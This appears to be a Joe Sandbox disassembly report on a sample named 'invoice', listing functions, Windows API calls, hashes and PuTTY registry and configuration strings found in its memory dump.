Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a012ae9b2a534f0b00a69c468bd54ee7c60a3dcbc6671916a4d5b4e189dc0c8
Instruction ID: b637dd27f7b64c713733a8a1713ae490f940c77b3b87b4c09e11aedb5f07c041
Opcode Fuzzy Hash: 6a012ae9b2a534f0b00a69c468bd54ee7c60a3dcbc6671916a4d5b4e189dc0c8
Instruction Fuzzy Hash: 7B326676601B4897DB64CF6AE58035973B8F788B84F14822ADB8E43F50DF74E9A2D700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCFA4E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 55
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32 ref: 000000013FDCFA9D
RegOpenKeyA.ADVAPI32 ref: 000000013FDCFABF
RegCloseKey.ADVAPI32(?,?,?,?,?,?,000000013FD6FDCF,?,?,00000000,000000013FD5C3D7), ref: 000000013FDCFAD7

Strings

Default Settings, xrefs: 000000013FDCFA70
Software\SimonTatham\PuTTY\Sessions, xrefs: 000000013FDCFA8A

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Open$Close
String ID: Default Settings$Software\SimonTatham\PuTTY\Sessions
API String ID: 3083169812-3012640657
Opcode ID: cbdc623e8525bf09c5c56db1a59cb416aba5d5f73df0a731ee1986e4e17db727
Instruction ID: 64c88e828f3fcf440d5e656703d44fa9febc76122bb1c439d2437f6ccd0010aa
Opcode Fuzzy Hash: cbdc623e8525bf09c5c56db1a59cb416aba5d5f73df0a731ee1986e4e17db727
Instruction Fuzzy Hash: FE217231A1474495FE60AB95E8587DAA3A0F784BD4F444139AD8D4B7A9DF3CC743CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDBA6A4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendDlgItemMessageA.USER32 ref: 000000013FDBA746
SendDlgItemMessageA.USER32 ref: 000000013FDBA75F

Strings

c && (c->ctrl->generic.type == CTRL_LISTBOX || (c->ctrl->generic.type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 000000013FDBA6E1
../windows/winctrls.c, xrefs: 000000013FDBA6E8

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ItemMessageSend
String ID: ../windows/winctrls.c$c && (c->ctrl->generic.type == CTRL_LISTBOX || (c->ctrl->generic.type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
API String ID: 3015471070-3312220692
Opcode ID: ef7d0784815cd36ba2c0ee0418bd8fac87b041d639b080403b0d2f10d2513e63
Instruction ID: 3041a6ee95c24a3fc94d6e7f2077ce287cadeaf51bfebf60556e2076285d1de4
Opcode Fuzzy Hash: ef7d0784815cd36ba2c0ee0418bd8fac87b041d639b080403b0d2f10d2513e63
Instruction Fuzzy Hash: 78110332B00A0889EB21CF56EC947D87BA0A79ABD4F418039DE4D4B794EA7CCE46C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD72305 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 373
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000013FDCFFBE: RegOpenKeyA.ADVAPI32 ref: 000000013FDCFFE5

_invalid_parameter_noinfo.LIBCMT ref: 000000013FDE34AD

Part of subcall function 000000013FDD0032: RegEnumKeyA.ADVAPI32 ref: 000000013FDD0087
Part of subcall function 000000013FDD0032: RegEnumKeyA.ADVAPI32 ref: 000000013FDD00D3

Strings

../config.c, xrefs: 000000013FDE3472
Default Settings, xrefs: 000000013FD72390, 000000013FD723FA, 000000013FD72412

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Enum$Open_invalid_parameter_noinfo
String ID: ../config.c$Default Settings
API String ID: 2249859634-2599137304
Opcode ID: ae0a3263a6bad89d8f6977feb45b20939b8ab7e7ac183cfdf2c1b51d23f2106f
Instruction ID: c941300125697610391e2ff76a839133e096f42e737e8b36e5f85f102dc237e4
Opcode Fuzzy Hash: ae0a3263a6bad89d8f6977feb45b20939b8ab7e7ac183cfdf2c1b51d23f2106f
Instruction Fuzzy Hash: 13E1F4B2B056C081FA61AFA6A54C3F9BB91B765FC4F485479CE8D0BB85CA3CC2578700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDE5CCC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

try_get_function.LIBVCRUNTIME ref: 000000013FDE5D05
LCMapStringW.KERNEL32 ref: 000000013FDE5D8D

Strings

LCMapStringEx, xrefs: 000000013FDE5CF9

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 4c5da3f85902f55d533aad4785e5d6fc3ea63a7b9090da7cb7f7c76ea62292ea
Instruction ID: 73f8894580fd9a8608be750d13c7bb3999b26ae5a44e9d534f24bb470a5a4ecd
Opcode Fuzzy Hash: 4c5da3f85902f55d533aad4785e5d6fc3ea63a7b9090da7cb7f7c76ea62292ea
Instruction Fuzzy Hash: 20110836A08B8086DB60CF56F44439AB7A5F7D9BD0F54413AEE8D83B29DF38C5558B40

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDBA610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendDlgItemMessageA.USER32 ref: 000000013FDBA695

Strings

c && (c->ctrl->generic.type == CTRL_LISTBOX || (c->ctrl->generic.type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 000000013FDBA64B
../windows/winctrls.c, xrefs: 000000013FDBA652

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ItemMessageSend
String ID: ../windows/winctrls.c$c && (c->ctrl->generic.type == CTRL_LISTBOX || (c->ctrl->generic.type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
API String ID: 3015471070-3312220692
Opcode ID: 9f7cd5d86e71cb09c9d84ff57ee1660e060e48d21521a95dde23887e8fe5d76f
Instruction ID: c0a19a96c36b75e5ea769052e2de5c23d8eeb56f7700a2dffd06d6be03211445
Opcode Fuzzy Hash: 9f7cd5d86e71cb09c9d84ff57ee1660e060e48d21521a95dde23887e8fe5d76f
Instruction Fuzzy Hash: 7201B171B1091844FF608B56D5A87E82B61EB9AF94F458039DE0D077A4EA28CB47CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDC9F02 Relevance: 4.5, APIs: 3, Instructions: 45
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32 ref: 000000013FDC9F1E
GetSystemDirectoryA.KERNEL32 ref: 000000013FDC9F71
LoadLibraryA.KERNEL32 ref: 000000013FDC9F9E

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: DirectorySystem$LibraryLoad
String ID:
API String ID: 2489551175-0
Opcode ID: 3d46fc8affd0155a1dff79896ce508d404f84989650877b9265e88a77d7225f9
Instruction ID: 6ed3c5f39a62e87e00d6716c3c1a72814d0a5e129510392052f0f51e49226a0c
Opcode Fuzzy Hash: 3d46fc8affd0155a1dff79896ce508d404f84989650877b9265e88a77d7225f9
Instruction Fuzzy Hash: 8B112A38E02614A9FB50AB62F908BD527A1FB59FD4F45123CDC09477B5EE3C92838740

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDE7310 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 000000013FDE7352

Strings

, xrefs: 000000013FDE7397

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 02e20f8145c497860b65462e899bd7924833d2ae602c9e7877e85e9b3a0378c8
Instruction ID: 8eefa04a3204c18087fe3d670e95bbd55f981d630a78cfe0583156378d8d5f16
Opcode Fuzzy Hash: 02e20f8145c497860b65462e899bd7924833d2ae602c9e7877e85e9b3a0378c8
Instruction Fuzzy Hash: F351F932A186D08AE760CF64E0483DD7BE1F354748F54412EEBDD47A89C738C64ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCFFBE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32 ref: 000000013FDCFFE5

Strings

Software\SimonTatham\PuTTY\Sessions, xrefs: 000000013FDCFFD2

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Open
String ID: Software\SimonTatham\PuTTY\Sessions
API String ID: 71445658-490553574
Opcode ID: 8386431d8a8f5184b539d87a2d7806f49be19ff40c499dcdca4c42a84b7197f2
Instruction ID: f710e5517462be7dca40cdad183a12222312e8adfd8bd5f29d75e26e1d22188f
Opcode Fuzzy Hash: 8386431d8a8f5184b539d87a2d7806f49be19ff40c499dcdca4c42a84b7197f2
Instruction Fuzzy Hash: B7F0F631A1075581FB209B65F4557EAB390EB88794F444239AE9D0B7E8DE3CC2439B40

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDE6CCC Relevance: 3.2, APIs: 2, Instructions: 194COMMON

Download Yara Rule

APIs

Part of subcall function 000000013FDE6F84: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,000000013FDE717C), ref: 000000013FDE6FAE

IsValidCodePage.KERNEL32(?,?,?,?,00000000,?,?,000000013FDE722F), ref: 000000013FDE6D42

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: CodePageValid
String ID:
API String ID: 1911128615-0
Opcode ID: eafb7a58298a8851be6e0836db317cd39e748884cb567d64bdea0a826f3be52a
Instruction ID: de3817b0e82b1e67bba6e0c496aacc87d9a6ca77d13e244d207e756fb76003ff
Opcode Fuzzy Hash: eafb7a58298a8851be6e0836db317cd39e748884cb567d64bdea0a826f3be52a
Instruction Fuzzy Hash: 3B81E772E1428496F7759F69E4583E97BA1E360B40F58813EDB8E476E1DA3ACB43C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDEAC0C Relevance: 3.1, APIs: 2, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,000000013FDDF513,?,?,?,000000013FDDF49E), ref: 000000013FDEAC25
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000013FDDF513,?,?,?,000000013FDDF49E), ref: 000000013FDEACE9

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: e1d8100e4ae19ea43a6ac17fb4416371607a5737ad4078613dea99ea0bd9589b
Instruction ID: e13587b5cb614c7ab7e593db8d254cf70d10dbb8cf6749ecbda0943f43ad772c
Opcode Fuzzy Hash: e1d8100e4ae19ea43a6ac17fb4416371607a5737ad4078613dea99ea0bd9589b
Instruction Fuzzy Hash: 7D21D335F5479582EA249F52A40439DB6A4F7A8BD0F08423CEE8E67BD9DF38C6539700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDBAE62 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SetDlgItemTextA.USER32(?,?,00000000,000000013FD5C41F), ref: 000000013FDBAECB

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ItemText
String ID:
API String ID: 3367045223-0
Opcode ID: 7ab9fcba86f20e4efc6ef76013920e7460f046375728902d9ffdc19a5a37e636
Instruction ID: b52ebd53faa14cb13a73e0f67fbe0bd85f625b6055464003e30d8b5d2af46d5b
Opcode Fuzzy Hash: 7ab9fcba86f20e4efc6ef76013920e7460f046375728902d9ffdc19a5a37e636
Instruction Fuzzy Hash: C2116536B0270841FE659E9AE4887E55B51EB88B94F18543D8E4D07791EA3ADDC3C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDE973C Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,000000013FDE65EA,?,?,?,000000013FDDF335,?,?,?,?,000000013FDE76D5), ref: 000000013FDE9791

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3971e329b6baa6242281246493c9ebb9a44570d10734c92eeda90cd9ff4b50af
Instruction ID: 06b8fbad63f15ec31e7ec2e60479d69dd02c4b99a18b64483b6985efbc0f373e
Opcode Fuzzy Hash: 3971e329b6baa6242281246493c9ebb9a44570d10734c92eeda90cd9ff4b50af
Instruction Fuzzy Hash: F2F09038B0320081FE647FE599593E523845FA8BD0F4D443C494F8A3D2ED2CC79B4212

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDE8060 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,000000013FDE71A0), ref: 000000013FDE809E

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 89ac1fc7cf41e0cbc7b3ddaa656e5642980364c56b1668d7165f403e4ecaa488
Instruction ID: 43f92efabc3afe3e068975673a23c584bbf5761c6a0383e8879eda533ce2cfa5
Opcode Fuzzy Hash: 89ac1fc7cf41e0cbc7b3ddaa656e5642980364c56b1668d7165f403e4ecaa488
Instruction Fuzzy Hash: 35F0A034F5160085FE646FF15E693E912805FA47F0F09023C6D2E8A3C1EA28C6836250

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDEE030 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a46037d487cd30d6c26167c5c2494e171c22ae4929a8aa564be31e3793bd91c2
Instruction ID: 01e22e91276c035c10249f652e9340162f625a8ee4d34c1dcfd3e832a2f07021
Opcode Fuzzy Hash: a46037d487cd30d6c26167c5c2494e171c22ae4929a8aa564be31e3793bd91c2
Instruction Fuzzy Hash: 84E04F34F0164054FE68AEE29A583E151941FA4BF4F0E433C5D3C467D1FE2CCA479110

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000000013FD6DF05 Relevance: 241.5, Strings: 192, Instructions: 1506COMMON

Download Yara Rule

Strings

CtrlAltKeys, xrefs: 000000013FD6EA86
TerminalModes, xrefs: 000000013FD6E20E
DECOriginMode, xrefs: 000000013FD6ED1A
RXVTHomeEnd, xrefs: 000000013FD6E828
ShadowBold, xrefs: 000000013FD6F73C
ANSIColour, xrefs: 000000013FD6EEF4
RemoteQTitleAction, xrefs: 000000013FD6E943
Compression, xrefs: 000000013FD6E44B
SunkenEdge, xrefs: 000000013FD6EBA3
AddressFamily, xrefs: 000000013FD6E233
FontQuality, xrefs: 000000013FD6EE72
ProxyTelnetCommand, xrefs: 000000013FD6E36F
SSH2DES, xrefs: 000000013FD6E76A
SSHLogOmitData, xrefs: 000000013FD6E02F
NoPTY, xrefs: 000000013FD6E42B
ScrollOnDisp, xrefs: 000000013FD6F324
SerialDataBits, xrefs: 000000013FD6F7B5
BeepInd, xrefs: 000000013FD6EC3C
DisableArabicShaping, xrefs: 000000013FD6ED9A
PasteRTF, xrefs: 000000013FD6F04A
PreferKnownHostKeys, xrefs: 000000013FD6E566
SerialFlowControl, xrefs: 000000013FD6F812
TerminalType, xrefs: 000000013FD6E1D7
RFCEnviron, xrefs: 000000013FD6E7C8
TryAgent, xrefs: 000000013FD6E46B
RekeyTime, xrefs: 000000013FD6E582
BugWinadj, xrefs: 000000013FD6F63E
ScrollBarFullScreen, xrefs: 000000013FD6F2E4
PortNumber, xrefs: 000000013FD6E09E
CRImpliesLF, xrefs: 000000013FD6ED7A
SUPDUPScrolling, xrefs: 000000013FD6F92F
PingInterval, xrefs: 000000013FD6E13E
ConnectionSharingUpstream, xrefs: 000000013FD6F874
WideFont, xrefs: 000000013FD6F6FA
WindowClass, xrefs: 000000013FD6F831
AuthGSSAPI, xrefs: 000000013FD6E683
ScrollOnKey, xrefs: 000000013FD6F304
-, xrefs: 000000013FD6E6BE
ProxyDNS, xrefs: 000000013FD6E298
AltF4, xrefs: 000000013FD6EA06
SshBanner, xrefs: 000000013FD6E623
SerialSpeed, xrefs: 000000013FD6F796
ComposeKey, xrefs: 000000013FD6EA66
FullScreenOnAltEnter, xrefs: 000000013FD6EB63
LinuxFunctionKeys, xrefs: 000000013FD6E844
RawCNP, xrefs: 000000013FD6F00A
Beep, xrefs: 000000013FD6EC1D
BellOverloadN, xrefs: 000000013FD6EC9A
TelnetRet, xrefs: 000000013FD6EAC6
SSHLogOmitPasswords, xrefs: 000000013FD6E00F
Cipher, xrefs: 000000013FD6E4E7
ProxyLogToTerm, xrefs: 000000013FD6E38E
LogHost, xrefs: 000000013FD6E747
NoDBackspace, xrefs: 000000013FD6E966
BackspaceIsDelete, xrefs: 000000013FD6E808
NetHackKeypad, xrefs: 000000013FD6E9E6
LogHeader, xrefs: 000000013FD6DFEF
RemoteCommand, xrefs: 000000013FD6E7A5
TCPKeepalives, xrefs: 000000013FD6E1BB
PingIntervalSecs, xrefs: 000000013FD6E17B
MouseAutocopy, xrefs: 000000013FD6F1A6
BugOldGex2, xrefs: 000000013FD6F619
MouseOverride, xrefs: 000000013FD6F0C9
X11AuthType, xrefs: 000000013FD6F3FE
UTF8Override, xrefs: 000000013FD6F265
PortForwardings, xrefs: 000000013FD6F474
AutoWrapMode, xrefs: 000000013FD6ED3A
FontVTMode, xrefs: 000000013FD6EE91
SerialLine, xrefs: 000000013FD6F777
SUPDUPLocation, xrefs: 000000013FD6F8CD
SshNoShell, xrefs: 000000013FD6E70C
BugPKSessID2, xrefs: 000000013FD6F5AA
Wordness%d, xrefs: 000000013FD6F0EF
BugChanReq, xrefs: 000000013FD6F65C
SshNoAuth, xrefs: 000000013FD6E5E3
BellOverload, xrefs: 000000013FD6EC7E
BellOverloadT, xrefs: 000000013FD6ECB9
ProxyLocalhost, xrefs: 000000013FD6E2B8
